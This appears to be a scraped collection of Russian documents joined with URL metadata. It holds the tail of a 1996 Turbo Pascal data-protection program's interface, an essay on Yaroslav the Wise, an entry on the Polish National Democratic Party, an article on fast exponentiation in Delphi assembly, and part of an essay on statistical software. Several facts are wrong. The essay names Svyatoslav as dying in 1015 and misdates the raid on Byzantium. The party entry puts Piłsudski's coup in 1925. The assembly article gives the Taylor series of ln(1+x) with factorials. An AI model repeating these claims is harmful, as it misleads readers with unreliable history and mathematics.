GetExtent(R);
R.Grow(0, -1);
Desktop := New(PMyDesktop, Init(R));
end;
{Инициализировать строку состояния}
procedure tMyApp.InitStatusLine;
var
R: tRect;
begin
GetExtent(R);
R.A.Y:= R.B.Y - 1;
StatusLine:= New(pStatusLine, Init(R,
NewStatusDef(0, $FFFF,
NewStatusKey('~F1~ О программе', kbF1, cmAboutBox,
NewStatusKey('~F3~ Файл', kbF3, cmOpen,
NewStatusKey('~F5~ Пароль', kbF10, cmMenu,
NewStatusKey('~F9~ Настройки', kbF9, cmOptions,
NewStatusKey('~F10~ Меню', kbF10, cmMenu,
NewStatusKey('~Alt-X~ Выход', kbAltX, cmQuit,
nil)))))),
nil)));
end;
{Изменить основную палитру}
function TMyApp.GetPalette: PPalette;
const
P: Array [apColor..apMonochrome] of string[Length(CAppColor)] =
(CAppColor, CAppBlackWhite, CAppMonochrome);
begin
P[apColor, 50] := #$11; {1F}
P[apColor, 51] := #$11; {2F}
P[apColor, 1] := #$21; {71}
GetPalette := @P[AppPalette];
end;
{Изменить палитру окна выбора файлов}
function TMyFDialog.GetPalette: PPalette;
const
{Синяя палитра}
CMyCluster = #64#65#66#67#68#69#70#71#72#73#74#75#76#77#78#79#80#81#82+
#83#84#85#86#87#88#89#90#91#92#93#94#95;
P: string [32] = CMyCluster;
begin
GetPalette := @P;
end;
{Инициализировать окно выбора файлов}
constructor TMyFileDialog.Init(AWildCard: tWildStr;
const ATitle, InputName: string;
AOptions: Word; HistoryId: Byte);
var
ScrollBar: PScrollBar;
R : TRect;
begin
{ Создание окна диалога }
R.Assign(15, 1, 64, 20);
TDialog.Init(R, ATitle);
Options:= Options or ofCentered;
WildCard:= AWildCard;
{ Строка ввода имени файла }
R.Assign(3, 3, 31, 4);
FileName:= New(PFileInputLine, Init(R, 79));
FileName^.Data^:= WildCard;
Insert(FileName);
R.Assign(2, 2, 6, 3);
Insert(New(PLabel, Init(R, InputName, FileName)));
R.Assign(31, 3, 34, 4);
Insert(New(PHistory, Init(R, FileName, HistoryId)));
{ Линейка скроллинга и список файлов }
R.Assign(3, 14, 34, 15);
ScrollBar:= New(PScrollBar, Init(R));
Insert(ScrollBar);
R.Assign(3, 6, 34, 14);
FileList:= New(PFileList, Init(R, ScrollBar));
Insert(FileList);
R.Assign(2, 5, 8, 6);
Insert(New(PLabel, Init(R, 'Файлы', FileList)));
{ Задание кнопок }
R.Assign(35, 3, 46, 5);
if AOptions and fdOpenButton <> 0 then
begin
Insert(New(PButton, Init(
R, 'Открыть', cmFileOpen, bfDefault)));
Inc(R.A.Y,3); Inc(R.B.Y,3);
end;
if AOptions and fdOkButton <> 0 then
begin
Insert(New(PButton, Init(
R, 'Ага', cmFileOpen, bfNormal)));
Inc(R.A.Y,3); Inc(R.B.Y,3);
end;
if AOptions and fdReplaceButton <> 0 then
begin
Insert(New(PButton, Init(
R, 'Замена',cmFileReplace, bfNormal)));
Inc(R.A.Y,3); Inc(R.B.Y,3);
end;
if AOptions and fdClearButton <> 0 then
begin
Insert(New(PButton, Init(
R, 'Удал.',cmFileClear, bfNormal)));
Inc(R.A.Y,3); Inc(R.B.Y,3);
end;
Insert(New(PButton, Init(
R, 'Нека', cmCancel, bfNormal)));
{ Информационная панель с параметрами файла }
R.Assign(1, 16, 48, 18);
Insert(New(PFileInfoPane, Init(R)));
SelectNext(False);
{ Загрузка каталога }
if AOptions and fdNoLoadDir = 0 then
begin
FileList^.ReadDirectory(WildCard);
Directory:= NewStr(GetCurDir);
end;
end;
Var
MyApp: TMyApp; {Переменная основного объекта}
Begin
WriteLn('Система защиты данных от НСД. Версия 1.0 beta.'+
+' 1996 МГВРК Еганов М. Ю., Юзефович А. Г.');
GetIntVec($09,Int09_Save);
MyApp.Init;
MyApp.Run;
MyApp.Done;
SetIntVec($09, Int09_Save);
End. |
https://doc4web.ru/istoricheskie-lichnosti/knyaz-yaroslav-mudriy.html | Князь Ярослав Мудрый | https://doc4web.ru/uploads/files/233/3f4ab063e585515ac989153bfb824260.docx | files/3f4ab063e585515ac989153bfb824260.docx | КИЕВСКОЕ ГОСУДАРСТВО В XI-XII ВЕКАХ.
Князь Ярослав Мудрый.
После смерти Святослава (1015), на Руси возникли княжеские междоусобия. Но после всех этих междоусобиц и братоубийств остались 2-а лидера: Ярослав и Мистислав, княживший в Тмутаракании. Между ним и Ярославом вспыхнула война, последствием которой был раздел государства: Киева и земли к западу от Днепра получил Ярослав; Чернигов и земли к востоку от Днепра получил Мистислав. И только после смерти Мистислава - Черниговского, Ярославу удалось восстановить единовластие в Русской земле (1034).
Правление Ярослава снискало ему на Руси большую славу и любовь; за его ум и начитанность ему дали прозвище Мудрого. Ярослав очень любил читать книги и собирал их. Для него переводили книги с греческого языка и покупали книги славянские. Собрание книг, устроенное Ярославом при главном Киевском храме св.Софии, служило на пользу общую и было доступно всем любившим книжную мудрость. Ярослав, по словам летописца, «насеял книжными словесами сердца верных людей»: он устраивал школы, строил церкви и приказывал духовенству учить людей, наставляя их в новой христианской вере. Так Ярослав являлся просветителем Руси.
Он был и её крепким защитником, деятельно охраняя границы государства от внешних врагов. Ему удалось наголову разбить печенегов и навсегда отогнать их от Киева (1034). Значение этой победы Ярослава над печенегами не было помрачено даже неудачею предпринятого при нём набега на Византию (1034). 3-х летняя война с греками, вызванная этим набегом, была последним столкновением Руси с Византией и окончилась освобождением русских пленных, захваченных греками во время набега.
Вывод: Киевское государство при Ярославе, несомненно, окрепло и процветало. Ярослав обладал, большими богатствами, позволявшими ему предпринимать обширные и великолепные постройки. В Киеве он выстроил замечательный храм Св.Софии и несколько других каменных храмов и монастырей. Для своих построек Ярослав выписал из Греции мастеров и строительные материалы. Всё это он делал не щадя средств и поэтому добивался блестящих результатов. При Ярославе торговля на Руси связывалась тесными отношениями с Германией, Францией, Венгрией, Польшей и сканд. странами.
1
1 |
https://doc4web.ru/istoriya/nacionalnodemokraticheskaya-partiya-polshi.html | Национально-демократическая партия Польши | https://doc4web.ru/uploads/files/125/3d0f91c7d208517a7ea77661f381b666.docx | files/3d0f91c7d208517a7ea77661f381b666.docx | Национально-демократическая партия (польск. Narodowa Demokracja) — польская правая националистическая партия, существовавшая в 1897—1947 годах.
История
В 1887 году польскими эмигрантами в Женеве во главе с Зигмунтом Милковским была снована Польская лига (Liga Polska). В начале 1890-ых во главе Национальной Лиги встали Роман Дмовский, Ян Поплавский и Зигмунт Балицкий. В 1893 она была реорганизована в Национальную лигу (Liga Narodowa).
В 1897 году была основана Национально-демократическая партия (Stronnictwo Narodowo-Demokratyczne), сначала как тайная организация а потом и как легальная партия. В программу партии входили политический прагматизм, органическая работа, развитие хозяйства, образование народа. По отношению к России, в состав которой тогда входила большая часть польских земель, программой партии было достижение большей культурной и политической автономии путем сотрудничества с Россией и переговоров.
Во время революции 1905 года поддерживали власти в борьбе с революцией, что даже выливалось вооружённые столкновения сторонников НДП с социалистами из ППС и СДКПиЛ. В 1905 году, НДП завершила свое организационное оформление, партийные структуры были созданы во всех 10 губерниях бывшего Царства Польского. Эндеки участвовали в выборах в Государственную думу. Депутаты от НДП стали основой для фракции Польского коло в Думах всех созывов.
Во время первой мировой войны НДП поддерживала Россию и Антанту в борьбе против Германии. НДП содействовала созданию польских Пулавского и Люблинского легионов в составе русской армии. В конце 1917 года Роман Дмовский создал в Лозанне Польский национальный комитет, который затем переехал в Париж.
После создания независимой польской республики была создана новая партия — Национально-демократический союз (Związek Ludowo-Narodowy), которая вошла в правительственную коалицию. Вела борьбу с революционным движением, поддерживала союз с западными державами против Советской России, выступала за полонизацию национальных меньшинств Польши. В 1928 была переименована в Национальную партию (Stronnictwo Narodowe).
После майского переворота 1925 года, когда власть захватил Юзеф Пилсудский, в партии из партии выделилась оппозиционная организация «Лагерь Великой Польши», а после её роспуска — Национально-радикальный союз (основан в 1934).
После второй мировой войны и установления социалистической власти в Польше партия прекратила своё существования, продолжали работу только отдельные группы в эмиграции.
Организации польской национальной демократии
Польская лига (Liga Polska) — 1887—1893
Национальная лига (Liga Narodowa) — 1893—1928
Национально-демократическая партия (Stronnictwo Narodowo-Demokratyczne) — 1897—1919
Национально-демократический союз (Związek Ludowo-Narodowy) — 1919—1928
Национальная партия (Stronnictwo Narodowe). — 1928—1947
Источник: http://ru.wikipedia.org/wiki/Национально-демократическая_партия_Польши |
https://doc4web.ru/informatika/varianti-algoritma-vozvedeniya-v-stepen-povishenie-tochnosti-i-u.html | Варианты алгоритма возведения в степень повышение точности и ускорение | https://doc4web.ru/uploads/files/128/c19bcbef9a9b84b47db6c28d19e86460.docx | files/c19bcbef9a9b84b47db6c28d19e86460.docx | Варианты алгоритма возведения в степень: повышение точности и ускорение.
Максим М. Гумеров
Как, никто этого еще не придумал?
Не берусь судить. Вероятно, задача о том, как максимально быстро возвести действительное положительное число в произвольную действительную степень, решалась примерно столь же часто, как и вставала, - а вставала, полагаю, не раз. И все же не так давно я с ужасом обнаружил, что RTL из состава Borland Delphi последних версий (как Delphi 6, так и Delphi 7) подходит к решению не более профессионально, чем прилежный пятиклассник, впервые столкнувшийся с такой проблемой.
Взглянем на исходный код функции Power из модуля Math, любезно предоставленный Borland Software:
function Power(const Base, Exponent: Extended): Extended;
begin
if Exponent = 0.0 then
Result := 1.0 { n**0 = 1 }
else if (Base = 0.0) and (Exponent > 0.0) then
Result := 0.0 { 0**n = 0, n > 0 }
else if (Frac(Exponent) = 0.0) and (Abs(Exponent) <= MaxInt) then
Result := IntPower(Base, Integer(Trunc(Exponent)))
else
Result := Exp(Exponent * Ln(Base))
end;
Примечательно, что в благих целях оптимизации процессор оставляют наедине с целой толпой ветвлений, приводящих его, в конце концов, в общем случае к пресловутому решению пятиклассника, а именно, к тривиальной формуле
(1) x**y = exp(ln(x**y)) = exp(y*ln(x)).
Здесь x**y означает возведение x в степень y, a exp(x) = e**x.
Что плохого в таком подходе к решению? Во-первых, в набор инструкций FPU не входит ни операция вычисления exp(x), ни взятия натурального логарифма ln(x). Соответственно, результат вычисляется в несколько этапов, в то время как можно пойти более прямым путем, как будет показано ниже. За счет этого падает скорость вычисления; кроме того, здесь действует интуитивное правило, которое грубо можно сформулировать так: чем больше операций выполняется над числом с плавающей запятой в регистрах сопроцессора, тем больше будет и суммарная погрешность результата.
ПРИМЕЧАНИЕ
Позднейшая проверка показала, что как Visual C из Visual Studio .NET, так и C++ Builder 4.5 реализуют возведение в степень более качественно. Используемый в них вариант концептуально не отличается от того решения, которое я хочу предложить.
Есть предложение
Давайте проведем инвентаризацию. Какие инструкции сопроцессора связаны с возведением в степень или взятием логарифма? Приведу краткую выдержку из [1] и [2]:
F2XM1 – вычисляет 2**x-1, где -1<x<1.
FSCALE (масштабирование степенью двойки) - фактически считает 2**trunc(x), где trunc(x) означает округление к 0, т.е. положительные числа округляются в меньшую сторону, отрицательные – в большую.
FXTRACT – извлекает мантиссу и экспоненту действительного числа.
FYL2X – вычисляет y*log2(x), где log2(x) – логарифм x по основанию 2.
FYL2XP1 – вычисляет y*log2(x+1) для -(1-1/sqrt(2))<x<1-1/sqrt(2) c большей точностью, нежели FYL2X. Здесь sqrt(x) означает вычисление квадратного корня.
Вот, в общем-то, и все. Но уже на первый взгляд этого хватает, чтобы понять, что задача может быть решена более прямо, чем предлагает RTL Borland Delphi.
Действительно, почему не заменить показатель степени в (1) на 2? Ведь неперово число отнюдь не является родным для двоичной арифметики! Тогда получится
(2) x**y = 2**log2(x**y) = 2**(y*log2(x)).
Это выражение для x**y в соответствии с вышеозначенными пятью инструкциями можно представить как композицию функций в таком виде:
(3) f(z)=2**z,
(4) g(x,y)=y*log2(x),
(5) xy =f(g(x,y)).
Так как вычислить f(z) в одно действие невозможно, приходится считать так:
(6) f(z)=2**z=2**(trunc(z)+(z-trunc(z)))=(2**trunc(z)) * (2**(z-trunc(z))).
Формулы (4)-(6) естественно выражаются таким ассемблерным кодом:
;Во-первых, вычисляем z=y*log2(x):
fld y ;Загружаем основание и показатель степени
fld x
fyl2x ;Стек FPU теперь содержит: ST(0)=z
;Теперь считаем 2**z:
fld st(0) ;Создаем еще одну копию z
frndint ;Округляем
fsubr st(0),st(1) ;ST(1)=z, ST(0)=z-trunc(z)
f2xm1 ;ST(1)=z, ST(0)=2**(z-trunc(z))-1
fld1
faddp ;ST(1)=z, ST(0)=2**(z-trunc(z))
fscale ;ST(1)=z, ST(0)=(2**trunc(z))*(2**(z-trunc(z)))=2**t
fxch st(1)
fstp st ;Результат остается на вершине стека ST(0)
ПРЕДУПРЕЖДЕНИЕ
Перед выполнением этого фрагмента кода нужно убедиться, что биты управления округлением в слове управления FPU установлены в режим округления к нулю. В Delphi это проще всего сделать при помощи функции SetRoundMode (модуль Math):
SetRoundMode(rmTruncate);
ПРИМЕЧАНИЕ
Так как на процессорах Intel Pentium IV последовательное многократное переключение между двумя (но не более) состояниями слова управления FPU выполняется гораздо быстрее, чем на ранних моделях, можно рассчитывать, что даже в тех ситуациях, когда придется перемежать вызов этого фрагмента кода с действиями, требующими иного режима округления, при работе на современной технике это не приведет к чрезмерным дополнительным временным затратам. Подробности см., например, в [3].
Полный код работоспособной функции на Object Pascal выглядит так:
function _Power(const x,y:FLOATTYPE):FLOATTYPE; //x>0!
asm
fld y
fld x
fyl2x
fld st(0)
frndint
fsubr st(0),st(1)
f2xm1
fld1
faddp
fscale
fxch st(1)
fstp st
end;
СОВЕТ
Имеет смысл создать перегруженные версии функции для различных типов аргументов FLOATTYPE, так как на практике часто главным недостатком встроенной функции является то, что она (как и все вызываемые ею функции) принимает в качестве аргументов действительные числа типа Extended, что приводит к весьма существенным затратам на конвертирование форматов при загрузке в стек FPU.
Чего мы достигли?
Эксперименты показали, что предложенный вариант функции возведения в степень повышает точность вычислений на один-два знака после запятой. Так как автору было несколько лень писать медленный код для сверхточного возведения в степень с целью проверки точности предложенного алгоритма, то эксперимент заключался в сравнении результатов со значением, получающемся в стандартном калькуляторе Windows. Если верить его справочной службе, вычисления в нем производятся с точностью до 32 десятичных знаков после запятой, что позволяет полагаться на него как на источник эталонных значений.
К сожалению, выигрыш в скорости абсолютно не ощущается. Это вполне объяснимо: согласно приложению C (“IA-32 Instruction Latency and Throughput”) документа [3], из всего этого фрагмента основная вычислительная нагрузка ложится на трансцендентные (ответственность за не вполне корректное применение термина ложится не на меня, а на господ из Intel) операции, а именно – FYL2X, FRNDINT, F2XM1 и FSCALE. Количество же этих операций в предложенном алгоритме и их общее число в реализации функций ln(x) и exp(x) в RTL Delphi одинаково.
Конечно, хотелось бы увеличить и скорость вычислений. Но мир не идеален, и за это придется расплачиваться все той же точностью. Как правило, в каждой ситуации существует предел допустимых погрешностей при расчетах. В иллюстративных целях я задался максимальной допустимой относительной погрешностью 0,0001=0,1%. В действительности, как будет видно из графиков относительной погрешности, удалось достичь еще большей точности.
Дальнейшие наши действия должны состоять в том, чтобы исключить трансцендентные математические операции. Ясно, что всякое представление в виде конечной композиции элементарных арифметических операций некоторой функции, неразложимой в такую композицию, является приближением исходной функции. То есть задача ставится так: нужно приблизить используемые трансцендентные функции композициями элементарных операций, оставаясь при этом в допустимых для погрешности пределах.
Аппроксимация функции 2x
Эта мера позволит нам избавиться сразу и от длительной F2XM1, и от выполняющейся ненамного быстрее FSCALE.
Существует бесконечное множество способов приблизить функцию f(x). Один из наиболее простых в вычислительном плане – подбор подходящего по точности многочлена g(x)=anxn+an-1xn-1+...+a1x+a0. Его коэффициенты могут быть постоянны, а могут некоторым образом зависеть от x. В первом случае коэффициенты легко найти методом наименьших квадратов, взяв значения исходной функции в нескольких точках и подобрав коэффициенты так, чтобы в этих точках многочлен принимал значения, как можно более близкие к значениям функции (подробное описание полиномиальной аппроксимации функций и метода наименьших квадратов можно найти в книгах, посвященных курсам вычислительной математики или обработке экспериментальных данных). Простота метода оборачивается существенным недостатком: он подчас неплох для выявления качественных тенденций, но плохо отражает исходную функцию количественно, причем, как правило, погрешность растет с уменьшением степени многочлена n, а скорость вычисления g(x) с ростом n падает.
Достойная альтернатива, позволяющая достаточно точно приближать гладкие кривые, такие, как y=2**x, - аппроксимация сплайнами. Говоря простым языком (возможно, чересчур простым – пусть меня извинят специалисты), сплайн – это кривая, моделирующая форму, принимаемую упругим стержнем, деформированным путем закрепления в заданных точках. Она проходит точно через заданные точки, подчиняясь при этом некоторым дополнительным условиям, в частности, условию непрерывности второй производной. Существуют различные виды сплайнов. В этой работе достаточно практично использование кубических сплайнов. Кубический сплайн на каждом отрезке между двумя последовательными (в порядке возрастания координаты x) эталонными точками (x,f(x)) описывается полиномом третьей степени g(x)=a3x3+a2x2+a1x+a0, где набор коэффициентов (a0,a1,a2,a3) свой для каждого отрезка. Поиск этих коэффициентов – не слишком сложная задача, но описание метода ее решения выходит за рамки этой статьи. Таблица коэффициентов, получающаяся после учета всех замечаний этого раздела, прилагается к статье.
Итак, я ограничусь лишь использованием полученных мною значений коэффициентов. Чтобы обеспечить необходимую точность на промежутке 0<=x<999, мне понадобились в качестве эталонных 2039 точек, которым соответствовали значения x=(i-40)/2, i=0..2038. Сорок значений на отрицательной полуоси нужны были только для того, чтобы отразить поведение сплайна в этой части плоскости, слегка скорректировав таким образом его вид на остальных отрезках; в вычислениях эти 40 отрезков не участвуют, т.к. для значений x<0 можно воспользоваться (без ощутимого проигрыша в скорости или точности) соотношением 2**(-|x|)=1/(2**|x|).
Итак, у нас есть таблица коэффициентов, представленная в виде массива из 1999 блоков по 8*4 байт (если для представления коэффициентов используется тип double). На Object Pascal такой массив описывается типом
array [0..1998] of packed record c3,c2,c1,c0:double end;
На практике возникает тонкий момент. Дело в том, что Delphi почему-то отказывается выравнивать массивы Double’ов по границе 8 байт. Лично у меня получается так, что адрес первого элемента всегда бывает кратен 4, но никогда – 8. Поэтому перед началом массива я вставляю заполнитель, чтобы избежать медленного чтения некоторых double’ов, которые частично лежат в одной 64- или 32-байтной линейке кэша, а частично – в следующей:
//Предполагаю, что выставлена опция компилятора {$Align 8}
Type
TArr=packed record
Padding:integer; //Фиктивный 4-байтовый заполнитель - чтобы массив выравнялся по 8 байтам
C:array [0..1998] of packed record c3,c2,c1,c0:double end; //Собственно коэффициенты
end;
На вход функции Exp2 поступает единственный аргумент x - возводимое в степень число. Как можно реализовать функцию?
Вот как это сделал я.
ПРЕДУПРЕЖДЕНИЕ
Как и для предыдущей функции, нужно обеспечить установку бит управления округлением в режим округления к нулю.
function Exp2(x:FLOATTYPE):FLOATTYPE; //0<=x<999
asm
fld x
call Core_Exp2
//Оформим основную часть в виде процедуры, т.к. она будет использоваться не только здесь -
// - да и перегрузку функций для другого типа аргумента так делать удобнее.
end;
procedure Core_Exp2; //На вершине стека FPU находится аргумент
var i:integer; //Сюда получим индекс в массиве
asm
fld st //Копируем аргумент
fadd st,st //st(1)=x, st(0)=2x
fistp i //Достаем i (индекс равен trunc(2x)); st(0)=x
fild i //Полагаемся на т.н. Store-Forwarding: округленное значение передается сразу инструкции
// fild, не ожидая, пока данные будут записаны в память; st(1)=x, st(0)=trunc(2x)
mov eax,i
fld1 //st(2)=x, st(1)=trunc(2x), st(0)=1
lea eax,[eax*4] //То есть eax:=i*4
add eax,eax // *2
add eax,1 // +1 = i*8+1 (далее при доступе к массиву используется eax*4, то есть i*32+4,
// т.к. каждая строка по 4*8=32 байта и заполнитель в начале – 4 байта.
// Если бы не было заполнителя, последнюю инструкцию нужно было бы убрать.
fadd st,st
fld1
fdivrp //=0.5
fmulp //st(1)=x, st(0)=0.5*trunc(2x)
fsubp //st(0)=dx
//Подсчет по схеме Горнера. Мне казалось, что можно сделать это быстрее,
//пустив параллельно несколько цепочек вычислений, но пока это не удалось сделать.
fld qword ptr coeffspow[4*eax]
fmul st,st(1)
fld qword ptr coeffspow[4*eax+8]
faddp
fmul st,st(1)
fld qword ptr coeffspow[4*eax+16]
faddp
fmul st,st(1)
fld qword ptr coeffspow[4*eax+24]
faddp
fxch st(1)
fstp st //Освобождаем ненужный регистр
end;
ПРЕДУПРЕЖДЕНИЕ
Выполнение этого фрагмента изменяет содержимое регистра EAX.
Оценим погрешность приближения. Так как результат, получаемый как _Power(2,x) (функция _Power приведена в начале статьи), заведомо точнее, чем Exp2(x), то в качестве оченки примем относительное отклонение значения последней функции от значения первой: Epsilon=abs( Exp2(x) - _Power(2,x) ) / _Power(2,x). Разумеется, выражение имеет смысл, если _Power(2,x)<>0.
Если построить график относительной погрешности, становится видно, что в пределах каждого из 1998 отрезков он имеет форму кривой с одним максимумом, сходящей к нулю на концах отрезка. При этом пределы колебаний величины погрешности остаются постоянными на всех отрезках, кроме нескольких последних – на них погрешность возрастает. Если не принимать во внимание эти отрезки, и ограничить область допустимых значений аргумента числом 990 (т.е. x<990), то для описания поведения относительной погрешности в зависимости от x достаточно показать ее график на двух последних допустимых для значений x отрезках:
Рисунок 1. Максимальная погрешность приближения функции Exp2=2**x (при x менее 990) не превышает 0,004%.
СОВЕТ
Мы отсекли отрезки, лежащие правее точки x=990. Следовательно, размер таблицы коэффициентов можно несколько сократить: индекс последнего элемента должен быть 990*2=1980, а не 1998. “Лишние” 19 последних строк таблицы можно просто удалить. Логично также изменить текст комментария в начале функции Exp2.
Новый вариант функции возведения в степень
Изменим реализацию возведения в степень в соответствии с предложенной аппроксимацией для 2**x:
function New_Power(x,y:FLOATTYPE):FLOATTYPE; //abs(y*log2(x))<990
asm
fld y
fld x
fldz //Сравним основание степени
fcomip st,st(1) // с 0 и соответственно установим флаги процессора
je @Zero
FYL2X //Стек: ST(0)=t=y*log2(x)
fldz
fcomip st,st(1) //Флаги выставляем соответственно числу 0-y*log2(x)
ja @Reverse //Если 0>y*log2(x), то сосчитаем 2**|y*log2(x)|, а после инвертируем
call Core_Exp2
jmp @Exit
@Zero:
fxch st(1)
fstp st //Освобождаем ненужный регистр
jmp @Exit
@Reverse:
fabs //Берем абсолютную величин
call Core_Exp2
fld1 //Считаем обратное значение:
fdivrp //1/(2**|y*log2(x)|)
@Exit:
end;
ПРЕДУПРЕЖДЕНИЕ
В этом фрагменте используется инструкция FCOMIP, впервые появившаяся на процессорах Pentium Pro. Любителям антиквариата придется использовать вместо пары команд FCOMIP / JE блок
FCOMP
FSTSW
TEST AX, 16384
JNZ @Zero //Вместо je @Zero
ПРЕДУПРЕЖДЕНИЕ
А вместо FCOMIP / JA - блок
FCOMP
FSTSW
TEST AX, 256 or 16384 //0<= y*log2(x) ?
JZ @Reverse //Нет, случай со взятием обратного значения
ПРЕДУПРЕЖДЕНИЕ
Вдобавок в этом случае изменяется регистр EAX.
Результаты тестирования отражены на графиках:
Рисунок 2. Временные затраты: New_Power – новая функция, Power – из состава RTL Borland Delphi.
Подпись X-0.511 на оси абсцисс отражает тот факт, что при проведении испытаний брались значения целые значения X, к которым затем прибавлялось число 0.511, чтобы гарантировать, что основание степени – число нецелое (т.е. чтобы рассматривать по возможности общий случай).
Черная линия поверх красного набора – сглаженные временные затраты функции Power, фиолетовая поверх синего – функции New_Power.
Замеры временных затрат производились с помощью инструкции RDTSC (процессоры начиная с Pentium):
function time:int64; //Вспомогательная функция для подсчета времени работы
asm rdtsc end;
и далее в коде
t:=time();
...
writeln(time()-t);
RDTSC возвращает в регистровой паре EDX:EAX число тактов процессора, прошедших с момента последнего сброса (reset). Машинный код инструкции – 0Fh, 31h.
Относительная погрешность ведет себя на удивление стабильно, изменяясь в пределах от 0 до 0,0040%. Поэтому достаточно представительным множеством значений аргумента является, к примеру, промежуток (0, 1000).
Рисунок 3.
Видно, что оцененная относительная погрешность (фактически - отклонение от значения, возвращаемого встроенной функцией) на самом деле не превосходит 0.004% !
В случае показателя степени 17 колебания становятся намного чаще, однако общая картина та же.
Аппроксимация функции log2x и “специализация” возведения в степень
Логарифмирование плохо поддается аппроксимации с помощью кубических сплайнов – точнее, мне удалось это сделать, причем с весьма высокой точностью, но лишь ценой проигрыша по времени в сравнении с использованием FYL2X. Однако здесь есть что предпринять и не прибегая к сплайнам.
Как известно, функция ln(1+x) при |x|<1 разлагается в ряд Тейлора следующим образом:
ln(1+x)=x-x2/(1*2)+x3/(1*2*3)+…+ xi/i!+…
Если абсолютная величина x достаточно мала, члены ряда, уже начиная с третьего, достаточно слабо сказываются на результате. Поэтому для значений x, достаточно близких к 1 (чтобы остаться в оговоренных выше рамках приемлемых погрешностей, x должен отстоять от 1 не больше чем на 0.01), вычисление log2(x)=ln(x)/ln(2)=ln(x)*log2(e)=ln(1+(x-1))*log2(e) можно заменить вычислением (t-t*t/2)*log2(e), где t=x-1.
Это позволяет построить еще один вариант функции возведения в степень для значений основания, близких к 1. В нем нет инструкции FYL2X, а вместо нее присутствует блок инструкций, помеченных символом “ * ” (знак “~” означает приближенное равенство):
function New_Power_XNear1(x,y:FLOATTYPE):FLOATTYPE; // abs(y*log2(x))<990
asm
fld y
fld x
fldz
fcomip st,st(1)
je @Zero
fld1 (*)
fsub st(1),st (*)
fld st(1) (*) //st(0)=1; st(1)=st(3)=t=x-1, st(2)=1, st(4)=y
fld1 (*)
fadd st,st (*)
fdivp st(2),st (*) //st(0)=st(2)=t, st(1)=1/2, st(3)=y
fmul st,st (*)
fmulp st(1),st (*) //st(0)=1/2*t*t, st(1)=t, st(2)=y
fsubp st(1),st (*) //st(0)=t-t*t/2 ~ ln(x), st(1)=y
fldl2e (*) //Загружаем константу log2(e)
fmulp (*) //st(0)~log2(x), st(1)=y
fmulp (*) //st(0)~y*log2(x)
fldz
fcomip st,st(1)
ja @Reverse
call Core_Exp2
jmp @Exit
@Zero:
fxch st(1)
fstp st //Освобождаем ненужный регистр
jmp @Exit
@Reverse:
fabs
call Core_Exp2
fld1
fdivrp
@Exit:
end;
Таким образом, нам в этом случае (при x, близких к 1) удается избавиться от всех инструкций FPU, принадлежащих к группе трансцендентных, что приводит к впечатляющему росту производительности:
Рисунок 4. Временные затраты: New_Power_XNear1 – специализированный вариант New_Power.
К сожалению, с ростом показателя степени максимальная погрешность растет, оставаясь, впрочем, в оговоренных пределах (т.е. меньше 0,1%; более того – меньше 0,01%) даже при очень больших показателях:
Рисунок 5.
Заключение
Таким образом, нам удалось получить функции, превосходящие встроенную по скорости от двух до четырех раз при погрешности порядка 0.004% - 0.01%. Не исключено, что существует возможность провести более качественную и более выгодную в смысле временных затрат аппроксимацию функций; возможно, даже по другому принципу, а не так, как это было сделано здесь (т.е. исходя из соотношения x**y=2**(y*log2(x)) ).
Для тех же случаев, когда необходима высокая точность вычислений, в качестве первого камня фундамента была рассмотрена функция, исправляющая недостаток Delphi RTL. Несомненно, это направление также достойно дальнейших исследований с целью ускорить заведомо медленные вычисления с повышенной точностью.
Список литературы
Intel® Architecture Software Developer’s Manual: том 2, Instruction set reference. Можно найти на сайте Intel www.intel.com.
Intel® VTune™ Performance Analyzer, гипертекстовая справка. И вообще, VTune – замечательный инструмент для поиска шероховатостей в программе.
Intel® Pentium® 4 and Intel® Xeon™ Processor Optimization Reference Manual. Все там же, на сайте Intel. |
https://doc4web.ru/informatika/zarubezhnie-statisticheskie-paketi-opisanie-vozmozhnosti-nedosta.html | Зарубежные статистические пакеты: описание, возможности, недостатки, перспективы развития | https://doc4web.ru/uploads/files/121/69da695f6b41e6e081017bb02868d335.docx | files/69da695f6b41e6e081017bb02868d335.docx | Зарубежные статистические пакеты: описание, возможности, недостатки, перспективы развития
Реферат выполнила Суслова А.И., группа № 427
Кафедра Экономической Информатики и Автоматизации Управления.
Ростовский Государственный Экономический университет (РИНХ)
г. Ростов-на-Дону 2004г.
Введение
Для успешного и прибыльного функционирования в условиях рынка и жесткой конкуренции западные фирмы, банки, страховые компании и т.д. нуждаются в тщательном анализе имеющейся информации о создании продукции, её сбыте, эксплуатации, а также анализ информации о конкурентах и т. п. и получении из нее надежных и обоснованных выводов. Поэтому потребность в средствах статистического анализа данных на Западе очень велика.
Именно этот факт и послужил причиной для развития рынка статистических программ, на котором предлагаются более тысячи разнообразных программ. Различные по объему и качеству реализованной статистики, области возможного применения, пользовательскому интерфейсу, цене, требованиям к оборудованию и т.п., они отражают многообразие потребностей обработки данных в различных областях человеческой деятельности.
Компьютерные системы для анализа данных - пакеты статистических программ - считаются наукоемкими программными продуктами, но, пожалуй, наиболее широко применяются в практической и исследовательской работе в самых разнообразных областях.
На сегодняшний день Международный рынок насчитывает около тысячи (или даже более) пакетов, решающих задачи статистического анализа данных в среде операционных систем Windows, DOS, OS/2.
В настоящее время, по перечисленным выше причинам, число статистических пакетов, получивших распространение в России, достаточно велико и спрос на них продолжает возрастать.
Из зарубежных пакетов это STATGRAPHICS, SPSS, SYSTAT, BMDP,SAS, CSS, STATISTICA, S-plus, и т.п.
Из отечественных можно назвать такие пакеты, как STADIA, ЭВРИСТА, МИЗОЗАВР, ОЛИМП:Стат-Эксперт, Статистик-Консультант, САНИ, КЛАСС-МАСТЕР и т.д.
Виды статистических пакетов
Как уже отмечалось, международный рынок насчитывает > 1000 пакетов, решающих задачи статистического анализа данных в среде операционных систем Windows, DOS, OS/2. Как ориентироваться в этом многообразии, если даже справочники, содержащие только краткие описания пакетов, представляют из себя объёмные тома?
Большую часть статистических пакетов можно разбить на две группы — это статистические пакеты общего назначения и специализированные программные продукты.
Универсальные пакеты – отсутствие прямой ориентации на специфическую предметную область, предлагают широкий диапазон статистических методов. В них отсутствует ориентация на конкретную предметную область. Они обладают дружественным интерфейсом. Из зарубежных универсальных пакетов наиболее распространены BAS, SPSS, Systat, Minilab, Statgraphics, STATISTICA.
